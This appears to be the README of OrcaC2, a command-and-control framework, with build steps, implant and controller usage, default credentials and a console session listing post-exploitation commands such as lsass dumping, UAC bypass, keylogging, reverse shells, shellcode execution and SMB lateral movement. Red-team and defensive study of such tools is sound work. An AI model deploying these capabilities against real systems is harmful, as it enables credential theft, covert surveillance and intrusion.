项目地址
简介
OrcaC2
Orca_ServerOrca_MasterOrca_Puppet
🐳
特性&功能
ps
安装
编译源码前,需要先在本地安装:go (>=1.18) 、gcc
Windows系统下编译
install.bat
Linux系统下编译
$ git clone https://github.com/Ptkatz/OrcaC2.git
$ cd OrcaC2
$ chmod +x install.sh
$ ./install.sh
install.sh
使用
Orca_Server端
./conf/app.ini./db/team.db./qqwry.dat
参数说明:
- -c: 指定配置文件路径
- -au: 添加用户
- -du: 删除用户
- -mu: 修改用户的密码
Orca_Puppet端
Orca_Puppet.exe -host <Server端IP:端口> -debug -hide
参数说明:
- -host: 连接到Server端的地址,默认为127.0.0.1:6000
- -debug: 打开调试信息,默认为false
- -hide: 在Linux系统下可以伪造进程名,并删除自身程序文件
generate/build
Orca_Master端
Orca_Master.exe -u <用户名> -p <密码> -H <Server端IP:端口>
参数说明:
- -u | –username: 连接到Server端的用户名
- -p | –password: 连接到Server端的密码
- -H | –host: 连接到Server端的地址,默认为127.0.0.1:6000
- -c | –color: logo与命令提示符的颜色
Server端数据库中默认的用户名和密码为 admin:123456
连接成功:
C:\Users\blood\Desktop\OrcaC2\out\master>Orca_Master_win_x64.exe -u admin -p 123456
OrcaC2 Master 0.10.8
https://github.com/Ptkatz/OrcaC2
,;;;;;;,
{;g##7 9####h;;;;,,
{E777777779###########F7'
~` 7##########;
<:_ "##########h
-(:__ VG#3######,
~-=:=:=:__ -""d#####]
~--====_ {Q####]
{;;, ~-<=: l#####
9###. ~==: {Q###F'
g###h, =::` {a####7
;;;########gss;g####P7
7777777777G###7777'
;g77h; lE779; {;P79] g#,
l# #] lE;;gF #] gLJ#,
7N;;F7 l# "9h "7L;g] gF777#,
by: Ptkatz
2022/11/04 19:29:53 [*] login success
Orca[admin] » help
OrcaC2 command line tool
Commands:
clear clear the screen
exit exit the shell
generate, build generate puppet
help use 'help [command]' for command help
list, ls list hosts
port use port scan or port brute
powershell manage powershell script
proxy activate the proxy function
select select the host id waiting to be operated
ssh connects to target host over the SSH protocol
Orca[admin] » list
+----+---------------+-----------------+------------------------------------------+-------+-----------+-------+
| ID | HOSTNAME | IP | OS | ARCH | PRIVILEGE | PORT |
+----+---------------+-----------------+------------------------------------------+-------+-----------+-------+
| 1 | PTKATZ/ptkatz | 10.10.10.10 | Microsoft Windows Server 2016 Datacenter | amd64 | user | 49704 |
| 2 | kali/root | 192.168.123.243 | Kali GNU/Linux Rolling | amd64 | root | 35872 |
+----+---------------+-----------------+------------------------------------------+-------+-----------+-------+
Orca[admin] » select 1
Orca[admin] → 10.10.10.10 » help
OrcaC2 command line tool
OrcaC2 command line tool
Commands:
assembly manage the CLR and execute .NET assemblies
back back to the main menu
clear clear the screen
close close the selected remote client
dump extract the lsass.dmp
exec execute shellcode or pe in memory
exit exit the shell
file execute file upload or download
generate, build generate puppet
getadmin bypass uac to get system administrator privileges
help use 'help [command]' for command help
info get basic information of remote host
keylogger get information entered by the remote host through the keyboard
list, ls list hosts
plugin load plugin (mimikatz|fscan)
port use port scan or port brute
powershell manage powershell script
process, ps manage remote host processes
proxy activate the proxy function
reverse reverse shell
screen screenshot and screensteam
select select the host id waiting to be operated
shell, sh send command to remote host
smb lateral movement through the ipc$ pipe
ssh connects to target host over the SSH protocolst over the SSH protocol
Orca[admin] → 10.10.10.10 »
TODO
- [ ] 支持Websocket SSL
- [x] Dump Lsass
- [x] Powershell模块加载
- [ ] 完善Linux-memfd无文件执行
- [ ] 内网中间人攻击
- [x] Linux系统的屏幕截图
- [ ] 基于VNC的远程桌面
- [ ] WireGuard搭建隧道接入内网
- [ ] 对MacOS系统更多支持
- [x] 根据payload生成被控端加载器
- [x] 使用C实现远程加载器加载被控端,解决被控端体积过大问题
- [ ] 多端口监听器
- [ ] 图形化
- [ ] …
参考
由衷感谢以上项目的作者/团队对开源的贡献与支持
已知Bug
assembly invokesmb exec-hideptypty
免责声明
本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。
在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标进行扫描。
如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,本人将不承担任何法律及连带责任。
在安装并使用本工具前,请您务必审慎阅读、充分理解各条款内容,限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。